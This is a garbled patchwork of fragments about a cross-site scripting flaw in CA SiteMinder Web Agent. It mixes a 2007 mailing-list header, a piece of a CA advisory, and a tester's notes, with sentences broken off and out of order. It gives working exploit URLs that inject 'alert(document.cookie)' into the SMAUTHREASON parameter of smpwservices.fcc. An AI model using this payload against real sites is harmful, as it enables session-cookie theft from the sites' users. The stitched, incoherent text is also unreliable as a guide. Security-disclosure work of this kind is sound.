I don't know the details of vulnerable version but smpwservices.fcc page was
accessed directly in the tested version.
Exploit code was triggered like this:
[*] with the URL:
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=X
I can view this javascript code in
Subject: SiteMinder Agent: Cross Site Scripting
From: Giuseppe Gottardi overet () securitydate ! it
Date: 2007-11-07 3:10:00
Security Advisory for CA Products utilizing CA SiteMinder Web
Agent
Last Updated: November 8, 2007
CA is aware of a report describing a cross-site scripting
# Exploit in [XSS]:
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS]
# Cross Site Scripting (Code):
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0
In this way we can inject the alert()